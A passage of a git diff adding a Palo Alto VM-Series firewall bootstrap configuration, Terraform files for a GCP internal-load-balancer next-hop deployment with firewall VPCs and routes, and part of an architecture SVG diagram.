+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/3</interface>
+                    <metric>10</metric>
+                    <destination>Health-Check-Probe2</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="10-30">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <next-vr>trust1</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <metric>10</metric>
+                    <destination>10.30.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="10-50">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <next-vr>trust2</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <metric>10</metric>
+                    <destination>10.50.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+            <interface>
+              <member>ethernet1/3</member>
+              <member>loopback.3</member>
+            </interface>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>no</disable-http>
+          </service>
+          <hostname>Multi-Nic-ILB</hostname>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <server-verification>yes</server-verification>
+        </system>
+        <plugins>
+          <vm_series version="1.0.6">
+            <gcp-cloudwatch>
+              <enabled>yes</enabled>
+              <update-interval>1</update-interval>
+            </gcp-cloudwatch>
+          </vm_series>
+        </plugins>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>multi-nic-ilb</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="Trust1">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                  <member>loopback.1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="Trust2">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                  <member>loopback.2</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="Trust3">
+              <network>
+                <layer3>
+                  <member>ethernet1/3</member>
+                  <member>loopback.3</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="service-tcp-22">
+              <protocol>
+                <tcp>
+                  <port>22</port>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="service-tcp-221">
+              <protocol>
+                <tcp>
+                  <port>221</port>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="service-tcp-222">
+              <protocol>
+                <tcp>
+                  <port>222</port>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Health-Check-Probes" uuid="29db5071-9cb4-4336-b8bb-5136e60a8b35">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>Trust1</member>
+                    <member>Trust2</member>
+                  </from>
+                  <source>
+                    <member>Health-Check-Group</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-end>no</log-end>
+                  <negate-destination>no</negate-destination>
+                </entry>
+                <entry name="Allow All" uuid="236a6c03-84de-4e70-b140-2cbcc8d74622">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="nat-out-test-network" uuid="f2fb376e-55dd-48a7-ad6c-1ce4ea32a774">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>Trust1</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>Testing Network</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <disabled>no</disabled>
+                </entry>
+                <entry name="nat-out-prod-network" uuid="f1216ad5-273e-40f8-9084-7d1b4096824d">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>Trust2</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>Production Network</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <disabled>no</disabled>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="interzone-default" uuid="e47aa9ee-29f0-4ce7-a1a8-70ecc9374b32">
+                  <action>deny</action>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="intrazone-default" uuid="40f41f9b-a1f4-4937-b5bd-9ebd211312bd">
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <profiles>
+            <vulnerability>
+              <entry name="Test Drive">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                </rules>
+                <threat-exception>
+                  <entry name="31719">
+                    <action>
+                      <reset-client/>
+                    </action>
+                  </entry>
+                </threat-exception>
+                <description>WW's profile</description>
+              </entry>
+            </vulnerability>
+            <url-filtering/>
+            <custom-url-category/>
+          </profiles>
+          <address>
+            <entry name="Health-Check-Probe1">
+              <ip-netmask>35.191.0.0/16</ip-netmask>
+            </entry>
+            <entry name="Health-Check-Probe2">
+              <ip-netmask>130.211.0.0/22</ip-netmask>
+            </entry>
+            <entry name="Production Network">
+              <ip-netmask>10.50.1.0/24</ip-netmask>
+            </entry>
+            <entry name="Testing Network">
+              <ip-netmask>10.30.1.0/24</ip-netmask>
+            </entry>
+          </address>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>loopback.1</member>
+                <member>ethernet1/2</member>
+                <member>loopback.2</member>
+                <member>ethernet1/3</member>
+                <member>loopback.3</member>
+              </interface>
+            </network>
+          </import>
+          <address-group>
+            <entry name="Health-Check-Group">
+              <static>
+                <member>Health-Check-Probe1</member>
+                <member>Health-Check-Probe2</member>
+              </static>
+            </entry>
+          </address-group>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..5b9c168b
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=packet-mirroring
+op-command-modes=mgmt-interface-swap
+dns-primary=
+dns-secondary=
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/fw_common.tf b/gcp/ilbnh-mig/fw_common.tf
new file mode 100644
index 00000000..aeaa685c
--- /dev/null
+++ b/gcp/ilbnh-mig/fw_common.tf
@@ -0,0 +1,106 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for firewalls
+module "bootstrap_common" {
+  source        = "./modules/gcp_bootstrap/"
+  bucket_name   = "fw-bootstrap-common"
+  file_location = "bootstrap_files/"
+  config        = ["init-cfg.txt", "bootstrap.xml"]
+#  config        = ["init-cfg.txt"]
+  license       = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create  firewall template
+#-----------------------------------------------------------------------------------------------
+module "fw_common" {
+  source    = "./modules/vmseries/"
+  base_name = var.fw_base_name
+  region    = var.region
+  target_size = var.target_size
+  zones = [
+    data.google_compute_zones.available.names[0],
+    data.google_compute_zones.available.names[1]
+  ]
+  networks = [
+    module.vpc0.network_self_link,
+    module.vpc1.network_self_link,
+    module.vpc2.network_self_link,
+    module.vpc3.network_self_link
+  ]
+  subnetworks = [
+    module.vpc0.subnetwork_self_link,
+    module.vpc1.subnetwork_self_link,
+    module.vpc2.subnetwork_self_link,
+    module.vpc3.subnetwork_self_link
+  ]
+  machine_type          = var.fw_machine_type
+  bootstrap_bucket      = module.bootstrap_common.bucket_name
+  mgmt_interface_swap   = "enable"
+  ssh_key               = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+  image                 = "${var.fw_image}-${var.fw_panos}"
+  nic0_public_ip        = false
+  nic1_public_ip        = true
+  nic2_public_ip        = false
+  nic3_public_ip        = false
+  create_instance_group = true
+
+  dependencies = [
+    module.bootstrap_common.completion,
+  ]
+}
+
+resource "google_compute_health_check" "hc_ssh_22" {
+  name      = "hc-ssh-22"
+
+  tcp_health_check {
+    port = var.health_check_port
+  }
+}
+
+module "ilb1" {
+  source            = "./modules/ilbnh/"
+  name              = "ilb1"
+  project_id        = var.project_id
+  all_ports         = true
+  ports             = []
+  health_checks     = [google_compute_health_check.hc_ssh_22.self_link]
+  region            = var.region
+  network           = module.vpc0.vpc_id
+  network_uri       = module.vpc0.network_self_link
+  subnetwork        = module.vpc0.subnetwork_self_link
+  ip_address        = var.ilb1_ip
+  group             = module.fw_common.vmseries_rigm
+}
+
+module "ilb2" {
+  source            = "./modules/ilbnh/"
+  name              = "ilb2"
+  project_id        = var.project_id
+  all_ports         = true
+  ports             = []
+  health_checks     = [google_compute_health_check.hc_ssh_22.self_link]
+  region            = var.region
+  network           = module.vpc2.vpc_id
+  network_uri       = module.vpc2.network_self_link
+  subnetwork        = module.vpc2.subnetwork_self_link
+  ip_address        = var.ilb2_ip
+  group             = module.fw_common.vmseries_rigm
+  }
+
+#-----------------------------------------------------------------------------------------------
+# Create routes route to internal LBs.
+resource "google_compute_route" "ilb_nhop_dest_10_30_1" {
+  name         = "ilb-nhop-dest-10-30-1"
+  dest_range   = "10.30.1.0/24"
+  network      = module.vpc2.network_self_link
+  next_hop_ilb = module.ilb2.forwarding_rule
+  priority     = 99
+}
+
+resource "google_compute_route" "ilb_nhop_dest_10_50_1" {
+  name         = "ilb-nhop-dest-10-50-1"
+  dest_range   = "10.50.1.0/24"
+  network      = module.vpc0.network_self_link
+  next_hop_ilb = module.ilb1.forwarding_rule
+  priority     = 99
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/fw_vpc.tf b/gcp/ilbnh-mig/fw_vpc.tf
new file mode 100644
index 00000000..230a66c0
--- /dev/null
+++ b/gcp/ilbnh-mig/fw_vpc.tf
@@ -0,0 +1,40 @@
+#-----------------------------------------------------------------------------------------------
+# Create firewall VPCs & subnets
+module "vpc0" {
+  source = "./modules/vpc/"
+  vpc                   = var.vpc0
+  subnet                = var.vpc0_subnet
+  cidr                  = var.vpc0_cidr
+  region                = var.region
+  allowed_sources       = ["0.0.0.0/0"]
+}
+
+module "vpc1" {
+  source = "./modules/vpc/"
+  vpc                   = var.vpc1
+  subnet                = var.vpc1_subnet
+  cidr                  = var.vpc1_cidr
+  region                = var.region
+  allowed_sources       = var.mgmt_sources
+  allowed_protocol      = "TCP"
+  allowed_ports         = ["443", "22"]
+}
+
+module "vpc2" {
+  source = "./modules/vpc/"
+  vpc                  = var.vpc2
+  subnet               = var.vpc2_subnet
+  cidr                 = var.vpc2_cidr
+  region               = var.region
+  allowed_sources      = ["0.0.0.0/0"]
+}
+
+module "vpc3" {
+  source = "./modules/vpc/"
+  vpc                  = var.vpc3
+  subnet               = var.vpc3_subnet
+  cidr                 = var.vpc3_cidr
+  region               = var.region
+  allowed_sources      = ["0.0.0.0/0"]
+  delete_default_route = true
+}
diff --git a/gcp/ilbnh-mig/images/curl.png b/gcp/ilbnh-mig/images/curl.png
new file mode 100644
index 00000000..e17b875c
Binary files /dev/null and b/gcp/ilbnh-mig/images/curl.png differ
diff --git a/gcp/ilbnh-mig/images/deployment.png b/gcp/ilbnh-mig/images/deployment.png
new file mode 100644
index 00000000..636f95d1
Binary files /dev/null and b/gcp/ilbnh-mig/images/deployment.png differ
diff --git a/gcp/ilbnh-mig/images/diagram.svg b/gcp/ilbnh-mig/images/diagram.svg
new file mode 100644
index 00000000..d68679f4
--- /dev/null
+++ b/gcp/ilbnh-mig/images/diagram.svg
@@ -0,0 +1,805 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xl="http://www.w3.org/1999/xlink" viewBox="-1 -83 1290 1003" width="1290" height="1003">
+  <defs>
+    <clipPath id="inner_stroke_clip_path">
+      <path d="M -.6807912 874.9022 L 163.88454 874.9022 L 163.88454 919.5638 L -.6807912 919.5638 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_2">
+      <path d="M 88.26219 896.7485 L 150.74298 896.7485 L 150.74298 916.7485 L 88.26219 916.7485 Z"/>
+    </clipPath>
+    <font-face font-family="Roboto" font-size="10" panose-1="2 0 0 0 0 0 0 0 0 0" units-per-em="1000" underline-position="-73.24219" underline-thickness="48.828125" slope="0" x-height="528.3203" cap-height="710.9375" ascent="927.7344" descent="-244.14062" font-weight="400">
+      <font-face-src>
+        <font-face-name name="Roboto-Regular"/>
+      </font-face-src>
+    </font-face>
+    <clipPath id="inner_stroke_clip_path_3">
+      <path d="M 88.26219 879.1023 L 144.52438 879.1023 L 144.52438 899.1023 L 88.26219 899.1023 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_4">
+      <path d="M 103.51921 62.49998 L 266 62.49998 L 266 157.84736 L 103.51921 157.84736 Z"/>
+    </clipPath>
+    <font-face font-family="Roboto" font-size="12" panose-1="2 0 0 0 0 0 0 0 0 0" units-per-em="1000" underline-position="-73.24219" underline-thickness="48.828125" slope="0" x-height="528.3203" cap-height="710.9375" ascent="927.7344" descent="-244.14062" font-weight="400">
+      <font-face-src>
+        <font-face-name name="Roboto-Regular"/>
+      </font-face-src>
+    </font-face>
+    <clipPath id="inner_stroke_clip_path_5">
+      <path d="M 286 62.49998 L 448.48077 62.49998 L 448.48077 157.84736 L 286 157.84736 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_6">
+      <path d="M 192.6144 177.99996 L 355.0952 177.99996 L 355.0952 231.99995 L 192.6144 231.99995 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_7">
+      <path d="M 103.51921 466.4999 L 266 466.4999 L 266 565.8999 L 103.51921 565.8999 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_8">
+      <path d="M 699.5596 62.49998 L 862.0404 62.49998 L 862.0404 157.84736 L 699.5596 157.84736 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_9">
+      <path d="M 699.5596 177.99996 L 862.0404 177.99996 L 862.0404 231.99995 L 699.5596 231.99995 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_10">
+      <path d="M 192.6144 271.99995 L 355.0952 271.99995 L 355.0952 327.99994 L 192.6144 327.99994 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_11">
+      <path d="M 192.6144 390.99993 L 355.0952 390.99993 L 355.0952 446.9999 L 192.6144 446.9999 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_12">
+      <path d="M 697.9904 678.10225 L 884.6904 678.10225 L 884.6904 774.9022 L 697.9904 774.9022 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_13">
+      <path d="M 710.1 467.4804 L 872.5808 467.4804 L 872.5808 565.88036 L 710.1 565.88036 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_14">
+      <path d="M 487.4192 467.4804 L 649.9 467.4804 L 649.9 565.88036 L 487.4192 565.88036 Z"/>
+    </clipPath>
+    <clipPath id="inner_stroke_clip_path_15">
+      <path d="M 286 466.4999 L 448.48077 466.4999 L 448.48077 565.8999 L 286 565.8999 Z"/>
+    </clipPath>
+  </defs>
+  <metadata> Produced by OmniGraffle 7.9.4 
+    <dc:date>2019-11-05 23:49:25 +0000</dc:date>
+  </metadata>
+  <g id="ilb-as-next-hop" stroke="none" stroke-opacity="1" fill="none" fill-opacity="1" stroke-dasharray="none">
+    <title>ilb-as-next-hop</title>
+    <g id="ilb-as-next-hop: Layer 1">
+      <title>Layer 1</title>
+      <g id="Group_1262">
+        <g id="Group_1246">
+          <g id="Graphic_1229">
+            <rect x="-.6807912" y="874.9022" width="164.56534" height="44.661545" fill="white"/>
+            <rect x="-.6807912" y="874.9022" width="164.56534" height="44.661545" stroke="#dedfde" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path)"/>
+          </g>
+          <g id="Graphic_1228">
+            <rect x="88.26219" y="896.7485" width="62.48079" height="19.999997" stroke="#666" stroke-linecap="round" stroke-linejoin="round" stroke-width="0" clip-path="url(#inner_stroke_clip_path_2)"/>
+            <text transform="translate(88.26219 901.2485)" fill="#212121">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#212121" x="0" y="9">Configuration</tspan>
+            </text>
+          </g>
+          <g id="Graphic_1227">
+            <rect x="88.26219" y="879.1023" width="56.26219" height="19.999997" stroke="#666" stroke-linecap="round" stroke-linejoin="round" stroke-width="0" clip-path="url(#inner_stroke_clip_path_3)"/>
+            <text transform="translate(88.26219 883.6023)" fill="#212121">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#212121" x="0" y="9">Connectivity</tspan>
+            </text>
+          </g>
+          <g id="Graphic_1226">
+            <path d="M 16.5 889.5023 L 44.131094 889.5023 L 71.76219 889.5023 C 72.03833 889.5023 72.26219 889.2785 72.26219 889.0023 C 72.26219 888.7262 72.03833 888.5023 71.76219 888.5023 L 44.131094 888.5023 L 16.5 888.5023 C 16.223858 888.5023 16 888.7262 16 889.0023 C 16 889.2785 16.223858 889.5023 16.5 889.5023 Z" fill="#4185f6"/>
+          </g>
+          <g id="Graphic_1225">
+            <path d="M 16.5 907.1485 L 44.131094 907.1485 L 71.76219 907.1485 C 72.03833 907.1485 72.26219 906.9246 72.26219 906.6485 C 72.26219 906.3723 72.03833 906.1485 71.76219 906.1485 L 44.131094 906.1485 L 16.5 906.1485 C 16.223858 906.1485 16 906.3723 16 906.6485 C 16 906.9246 16.223858 907.1485 16.5 907.1485 Z" fill="#616161"/>
+          </g>
+        </g>
+        <g id="Group_1261">
+          <g id="Group_822">
+            <title>GCP Zone</title>
+            <g id="Graphic_849">
+              <rect x="-.6807912" y="-83" width="993.3616" height="937.9022" fill="#eaedef"/>
+            </g>
+            <g id="Group_843">
+              <title>Page-1</title>
+              <g id="Graphic_848">
+                <title>Shape</title>
+                <path d="M 28.12684 -51.970807 L 25.979013 -48.23717 L 20.354086 -48.23717 C 19.852293 -48.23726 19.388901 -48.505824 19.139364 -48.94117 L 14.58955 -56.87381 C 14.34255 -57.30512 14.34255 -57.83501 14.58955 -58.26632 L 16.320932 -61.28402 L 18.458038 -57.570675 L 21.679779 -51.970807 Z" fill="#fbbc05"/>
+              </g>
+              <g id="Graphic_847">
+                <title>Shape</title>
+                <path d="M 35.21825 -56.87383 L 30.668436 -48.93999 C 30.419118 -48.504425 29.955587 -48.23578 29.453714 -48.235986 L 25.977814 -48.235986 L 28.12564 -51.969625 L 31.349763 -57.570675 L 28.12564 -63.17054 L 32.404597 -63.17054 L 35.21705 -58.26634 C 35.466214 -57.83572 35.46667 -57.304876 35.21825 -56.87383 Z" fill="#ea4335"/>
+              </g>
+              <g id="Graphic_846">
+                <title>Shape</title>
+                <path d="M 32.405778 -63.17054 L 21.679779 -63.17054 L 18.458038 -57.570675 L 16.32095 -61.285216 L 19.139382 -66.20016 C 19.388693 -66.63573 19.852216 -66.90438 20.354086 -66.90418 L 29.454914 -66.90418 C 29.956626 -66.90379 30.419878 -66.635306 30.669635 -66.20018 Z" fill="#4285f4"/>
+              </g>
+              <g id="Line_845">
+                <title>Shape</title>
+              </g>
+              <g id="Graphic_844">
+                <title>Oval</title>
+                <circle cx="24.9039" cy="-57.570675" r="2.80053834397648" fill="white"/>
+              </g>
+            </g>
+            <g id="Group_823">
+              <title>GCP logo</title>
+              <g id="Graphic_842">
+                <title>Fill-3</title>
+                <path d="M 94.00208 -57.26551 C 94.00208 -60.49545 96.44318 -62.93716 99.64292 -62.93716 C 101.281 -62.93716 102.66086 -62.28513 103.6315 -61.16288 L 102.66086 -60.222434 C 101.90283 -61.16288 100.88658 -61.60229 99.64292 -61.60229 C 97.35343 -61.60229 95.42755 -59.93463 95.42755 -57.26551 C 95.42755 -54.59639 97.35343 -52.92873 99.64292 -52.92873 C 101.00799 -52.92873 102.16044 -53.56535 102.97948 -54.505796 L 103.9495 -53.53515 C 102.99427 -52.39811 101.4628 -51.59386 99.64292 -51.59386 C 96.44318 -51.59386 94.00208 -54.03557 94.00208 -57.26551" fill="#757575"/>
+              </g>
+              <g id="Graphic_841">
+                <title>Fill-5</title>
+                <rect x="105.04076" y="-62.69422" width="1.3952644" height="10.857669" fill="#757575"/>
+              </g>
+              <g id="Graphic_840">
+                <title>Fill-7</title>
+                <path d="M 113.72979 -55.551936 C 113.72979 -57.25041 112.54714 -58.23585 111.30349 -58.23585 C 110.05983 -58.23585 108.87718 -57.25041 108.87718 -55.551936 C 108.87718 -53.85346 110.05983 -52.868025 111.30349 -52.868025 C 112.54714 -52.868025 113.72979 -53.85346 113.72979 -55.551936 M 115.12506 -55.551936 C 115.12506 -53.292643 113.53258 -51.59417 111.30349 -51.59417 C 109.07439 -51.59417 107.48192 -53.292643 107.48192 -55.551936 C 107.48192 -57.81123 109.07439 -59.5097 111.30349 -59.5097 C 113.53258 -59.5097 115.12506 -57.81123 115.12506 -55.551936" fill="#757575"/>
+              </g>
+              <g id="Graphic_839">
+                <title>Fill-8</title>
+                <path d="M 121.43277 -51.83674 L 121.43277 -52.86778 L 121.37238 -52.86778 C 120.96255 -52.185553 120.03751 -51.59392 119.02187 -51.59392 C 117.11078 -51.59392 116.18574 -52.883185 116.18574 -54.71786 L 116.18574 -59.26726 L 117.581 -59.26726 L 117.581 -54.94527 C 117.581 -53.3984 118.35444 -52.86778 119.41568 -52.86778 C 120.62914 -52.86778 121.37238 -54.035634 121.37238 -55.172676 L 121.37238 -59.26726 L 122.76702 -59.26726 L 122.76702 -51.83674 Z" fill="#757575"/>
+              </g>
+              <g id="Graphic_838">
+                <title>Fill-9</title>
+                <path d="M 130.01519 -55.551936 C 130.01519 -57.25041 128.89294 -58.23585 127.64928 -58.23585 C 126.40624 -58.23585 125.28399 -57.22021 125.28399 -55.551936 C 125.28399 -53.88366 126.40624 -52.868025 127.64928 -52.868025 C 128.89294 -52.868025 130.01519 -53.85346 130.01519 -55.551936 M 123.88872 -55.551936 C 123.88872 -57.826635 125.54159 -59.5097 127.42187 -59.5097 C 128.60513 -59.5097 129.53017 -58.91869 129.95418 -58.23585 L 130.01519 -58.23585 L 129.95418 -59.26689 L 129.95418 -62.694036 L 131.34944 -62.694036 L 131.34944 -51.836984 L 130.01519 -51.836984 L 130.01519 -52.868025 L 129.95418 -52.868025 C 129.53017 -52.1858 128.60513 -51.59417 127.42187 -51.59417 C 125.54159 -51.59417 123.88872 -53.277236 123.88872 -55.551936" fill="#757575"/>
+              </g>
+              <g id="Graphic_837">
+                <title>Fill-10</title>
+                <path d="M 138.88529 -57.56878 C 140.12894 -57.56878 140.82658 -58.599824 140.82658 -59.46447 C 140.82658 -60.3285 140.12894 -61.35954 138.88529 -61.35954 L 136.55019 -61.35954 L 136.55019 -57.56878 Z M 135.15493 -51.83674 L 135.15493 -62.694406 L 138.85509 -62.694406 C 140.65956 -62.694406 142.25142 -61.35954 142.25142 -59.46447 C 142.25142 -57.56878 140.65956 -56.23453 138.85509 -56.23453 L 136.55019 -56.23453 L 136.55019 -51.83674 Z" fill="#757575"/>
+              </g>
+              <g id="Graphic_836">
+                <title>Fill-11</title>
+                <rect x="143.23674" y="-62.69422" width="1.3952644" height="10.857669" fill="#757575"/>
+              </g>
+              <g id="Graphic_835">
+                <title>Fill-12</title>
